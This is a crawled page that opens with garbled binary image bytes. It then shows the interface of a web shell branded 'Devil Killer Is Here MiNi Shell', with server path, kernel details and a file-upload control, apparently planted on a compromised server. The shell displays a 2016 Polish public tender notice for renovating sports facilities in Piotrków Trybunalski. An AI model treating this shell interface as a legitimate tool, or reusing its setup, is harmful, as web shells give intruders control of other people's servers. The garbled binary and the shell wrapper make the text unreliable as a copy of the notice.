JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160412/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160412/84854-N-2016.html

<p class="kh_header"><b>Piotrków Trybunalski: REMONT  OBIEKTÓW  OŚRODKA   I  REKREACJI
W  PIOTRKOWIE TRYBUNALSKIM</b><br>
<b>Numer ogłoszenia: 84854 - 2016; data zamieszczenia: 12.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji , al. 3 Maja 6b, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 7326569, 7326651, faks 44 732 65 69 wew. 122.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osirpt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT  OBIEKTÓW  OŚRODKA   I  REKREACJI
W  PIOTRKOWIE TRYBUNALSKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1
REMONT  POMIESZCZENIA  ZNAJDUJĄCEGO  SIĘ  W  BUDYNKU  HALI  RELAX
W  PIOTRKOWIE  TRYBUNALSKIM  PRZY  AL. 3 MAJA  6B.
Remont pomieszczenia (siłowni) znajdującego  się  w  budynku  Hali  Relax               w Piotrkowie Trybunalskim przy Al. 3 Maja 6B.
- Roboty przygotowawcze,
- Roboty malarskie,
- Roboty posadzkarskie,
- Roboty związane z wymiana wykładziny podłogowej PCV i dywanowej na ścianach,
- Wymiana obróbek blacharskich,
- Wymiana naświetla na okno rozwieralno-uchylne,
- Wymiana narożników zabezpieczających rogi ścian,
- Roboty porządkowe.

Część 2
REMONT  OBIEKTU  CENTRUM  REKREACYJNEGO  W  PIOTRKOWIE  TRYBUNALSKIM  PRZY  UL. BELZACKIEJ 108/110.
a)	Remont obiektu  Centrum Rekreacyjnego w Piotrkowie Trybunalskim przy         ul. Belzackiej 108/110.
- Roboty tynkarskie,
- Roboty przygotowawcze,
- Roboty malarskie,
- Roboty związane z wymiana wykładziny PCV,
- Wymiana skrzydeł drzwiowych,
- Wymiana osprzętu instalacji elektrycznych,
- Wymiana obróbek blacharskich,
- Pokrycie dachu papą termozgrzewalną,
- Roboty porządkowe.

b) Roboty remontowe zabudowy grzejników na sali gimnastycznej.
- Demontaż starej zabudowy grzejników,
- Malowanie konstrukcji wsporczej,
- Roboty związane z montażem drabinek i zabudową boków grzejników,
- Roboty porządkowe.

Część 3
REMONT  POMIESZCZEŃ  ZNAJDUJĄCYCH  SIĘ  W  BUDYNKU  STADIONU  MIEJSKIEGO  W  PIOTRKOWIE  TRYBUNALSKIM  PRZY  UL. ŻWIRKI 6. 
Roboty remontowe pomieszczeń po pożarze znajdujących  się  w  budynku  Stadionu  Miejskiego  w  Piotrkowie  Trybunalskim  przy  ul. Żwirki 6.
- Rozebranie posadzki z paneli podłogowych,
- Skucie tynków,
- Demontaż drzwi i ościeżnic,
- Demontaż okna z pcv,
- Wymiana instalacji elektrycznej,
- Uzupełnienie tynków cementowo-wapiennych,
- Gruntowanie ścian i sufitów,
- Zbrojenie ścian i sufitów siatką Do dociepleń,
- Gładzie gipsowe,
- Malowanie pomieszczeń
- Montaż stolarki okiennej i drzwiowej,
- Ułożenie posadzki z paneli podłogowych,
- Wymiana grzejników,
- Roboty porządkowe.

Część 4
REMONT  ELEWACJI    BUDYNKU  POŁOŻONEGO NA TERENIE  KORTÓW  TENISOWYCH / LODOWISKA  MIEJSKIEGO  W  PIOTRKOWIE  TRYBUNALSKIM  PRZY  UL. ŻEROMSKIEGO 22. 
Remont  elewacji    budynku  położonego na terenie  kortów  tenisowych / lodowiska  miejskiego  w  Piotrkowie  Trybunalskim  przy  ul. Żeromskiego 22.
- Wycinkę gałęzi,
- Zabezpieczenie okien i drzwi folią,
- Zabezpieczenie opaski budynku,
- Wykonanie warstwy zbrojącej z siatki na ścianie wraz z tynkiem silikonowym,
- Demontaż i ponowny montaż rur spustowych z blachy powlekanej,
- Demontaż i ponowny montaż elementów zewnętrznych na budynku (oświetlenie, daszek, szyld),
- Roboty porządkowe i wywóz odpadów z terenu budowy.

Część 5
REMONT  POMIESZCZEŃ  ZNAJDUJĄCYCH  SIĘ  W  BUDYNKU  OŚRODKA  SPORTU I REKREACJI  W PIOTRKOWIE TRYBUNALSKIM  PRZY  AL. 3 MAJA  6B.
a) remont  pomieszczeń (łazienek)  znajdujących  się  w  budynku  Ośrodka  Sportu    i Rekreacji  w  Piotrkowie Trybunalskim  przy  Al. 3 Maja  6B.
- Rozebranie okładziny ściennej i podłogowej z płytek ceramicznych,
- Demontaż urządzeń sanitarnych,
- Wykucie otworów pod poszerzenie drzwi wejściowych,
- Montaż nadproży,
- Wymiana instalacji elektrycznej,
- Wymiana drzwi wraz z ościeżnicami,
- Ułożenie nowych płytek ceramicznych i terakotowych,
- Zabudowy z płyt gipsowo-kartonowych,
- Montaż ścianek systemowych do WC,
- Biały montaż,
- Malowanie.

b)	Roboty remontowe związane z naprawą okien w budynku Ośrodka  Sportu   i Rekreacji  w  Piotrkowie Trybunalskim  przy  Al. 3 Maja  6B
- Roboty przygotowawcze,
- Zakotwienie istniejących okien do podłoża,
- Uszczelnienie bruzd pianką poliuretanową niskoprężną,
- Zaprawienie bruzd i przeszpachlowanie ościeży okiennych,
- Malowanie ościeży,
- Roboty porządkowe.

UWAGA ! 
Wykonawca przystępując do w/w postępowania może złożyć osobną ofertę na każdą z pięciu części i na tę część lub części postępowania, którymi jest zainteresowany..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia.

- nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia.
Warunek dotyczący posiadania wiedzy i doświadczenia, zamawiający uzna               za spełniony w przypadku, gdy Wykonawca:
a) wykaże co najmniej trzy roboty budowlane  (wykonane w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadające rodzajem przedmiotowi niniejszego zamówienia, tj.
Część 1
obejmujące swym zakresem roboty remontowo-budowlane na kwotę 25 000,00 zł brutto każda - wg załącznika nr  4;
Część 2
obejmujące swym zakresem roboty remontowo-budowlane na kwotę 62 000,00 zł brutto każda - wg załącznika nr  4;
Część 3
obejmujące swym zakresem roboty remontowo-budowlane na kwotę 17 000,00 zł brutto każda - wg załącznika nr  4;
Część 4
obejmujące swym zakresem roboty remontowo-budowlane na kwotę 15 000,00 zł brutto każda - wg załącznika nr  4;
Część 5
obejmujące swym zakresem roboty remontowo-budowlane na kwotę 32 000,00 zł brutto każda - wg załącznika nr  4;


b) załączy do każdej z pięciu części osobno dokumenty potwierdzające, że roboty wyszczególnione w załączniku nr 4 zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia.

- nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia.
Warunek dotyczący dysponowania  osobami zdolnymi do wykonania zamówienia, zostanie przez zamawiającego uznany za spełniony w przypadku, gdy wykonawca wykaże i przedłoży: 
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności dla kierownika robót w zakresie robót konstrukcyjno-budowlanych dotyczy Części 1,2,3,4,5  - wg załącznika nr 3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia.

- nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.	Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, na zasadach określonych w art. 26 ust. 2b ustawy, to w takim przypadku Wykonawca zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności składając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, podpisane przez osoby upoważnione do reprezentacji tych podmiotów dotyczy Części 1,2,3,4,5  - wzór dokumentu załącznik nr 6.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne  postanowienia umowy Zamawiający zawarł we wzorze umowy stanowiącym załącznik  do SIWZ.
2.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy, z zastrzeżeniem ust. 3.
3.	Zmiany umowy będą mogły nastąpić w na?stępujących okolicznościach:
     a) zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby niniejszego warunku należy rozumieć zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:
-  o charakterze niezależnym od Stron,
- którego Strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy      zachowaniu należytej staranności,
- której nie można przypisać drugiej Stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w   szczególności:
powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia,
b)	zmiany powszechnie obowiązujących przepisów prawa w zakre?sie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia Stron,
c)	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie  umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu  jednoznacznej interpretacji jej zapisów przez Strony, 
d)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie  zawarcia  umowy okoliczność prawna, ekonomiczna lub techniczna, za którą  żadna  ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy,  zgodnie  ze  specyfikacją   istotnych  warunków  zamówienia  -   Zamawiający dopuszcza możliwość zmiany umowy,  w  szczególności  terminu realizacji zamówienia,
e) zmiany stawki VAT w razie ustawowej zmiany przepisów o VAT, stosownie do  zmian dokonywanych w tym zakresie,
f) wystąpi przedłużenie procedury przetargowej (przedłużenie, które wpłynie na zmianę terminu rozpoczęcia realizacji przynajmniej o jeden tydzień),
g)	wystąpi przedłużenie, w stosunku do terminów określonych przepisami prawa, czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia, a  nie wynikających  z  przyczyn  leżących  po  stronie Wykonawcy,
h)	wystąpi konieczność zmiany formy zabezpieczenia należytego wykonania umowy (dotyczy w przypadku, kiedy Zamawiający żąda zabezpieczenia należytego wykonania umowy),
i) oznaczenia danych dotyczących Zamawiającego lub Wykonawcy,
j)  zmiany Podwykonawcy,*
     k) zmiany zakresu części zmówienia powierzonej Podwykonawcom,*
     l)  rezygnacji Podwykonawcy z udziału przy realizacji zamówienia,*
ł)   zmiany podmiotu trzeciego, na zasobach którego polega Wykonawca wykazując spełnienie warunku udziału w postępowaniu, z zastrzeżeniem, że nowy podmiot lub wykonawca samodzielnie będzie spełniał warunki udziału w postępowaniu w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia.*
*Zapisy mają zastosowanie w przypadku realizacji przedmiotu umowy przy pomocy Podwykonawców.
4.  Okoliczności określone w pkt 3  niniejszego Rozdziału pod rygorem ich pominięcia, winny być potwierdzone notatką służbową, sporządzoną przez uprawnionego pracownika Zamawiającego. Zmiany wymagają sporządzenia stosownego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osirpt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji
97 - 300 Piotrków Trybunalski
Al. 3 Maja 6B
pokój 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2016 godzina 10:00, miejsce: Ośrodek Sportu i Rekreacji
97 - 300 Piotrków Trybunalski
Al. 3 Maja 6B
pokój 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> REMONT  POMIESZCZENIA  ZNAJDUJĄCEGO  SIĘ  W  BUDYNKU  HALI  RELAX
W  PIOTRKOWIE  TRYBUNALSKIM  PRZY  AL. 3 MAJA  6B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.  Opis przedmiotu zamówienia: 
Remont pomieszczenia (siłowni) znajdującego  się  w  budynku  Hali  Relax              w Piotrkowie Trybunalskim przy Al. 3 Maja 6B.
- Roboty przygotowawcze,
- Roboty malarskie,
- Roboty posadzkarskie,
- Roboty związane z wymiana wykładziny podłogowej PCV i dywanowej na ścianach,
- Wymiana obróbek blacharskich,
- Wymiana naświetla na okno rozwieralno-uchylne,
- Wymiana narożników zabezpieczających rogi ścian,
- Roboty porządkowe.

II. Pozostałe informacje dotyczące przedmiotu zamówienia:
1.	Wykonawca udzieli minimum 36 miesięcy gwarancji na wykonany przedmiot zamówienia.
2.	Zamawiający wymaga należytej staranności przy realizacji niniejszego  zamówienia.
3.	Szczegółowy opis przedmiotu zamówienia  podano w Przedmiarze i Specyfikacji    Technicznej Wykonania i Odbioru Robót Budowlanych, które stanowią załączniki do SIWZ.
4.	Wykonawca, z którym zostanie podpisana umowa dostarczy do  dnia podpisania umowy Kosztorys Ofertowy zgodny z ofertą przedstawioną do przetargu. Wymaganą metodą kalkulacji ceny za roboty budowlane jest metoda uproszczona. Na końcu Kosztorysu Ofertowego należy doliczyć podatek od towarów i usług VAT.
5.	WYMAGANIA OGÓLNE WYKONANIA ROBÓT:
- Zamówienie  należy  wykonać  wg  Przedmiaru i Specyfikacji  Technicznej Wykonania    i Odbioru Robót Budowlanych, a wszystkie materiały użyte do budowy muszą posiadać: 
            a. Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych,
b. Deklarację zgodności lub certyfikat zgodności z: Polską Normą lub, Aprobatą techniczną w przypadku wyrobów, dla których nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją;
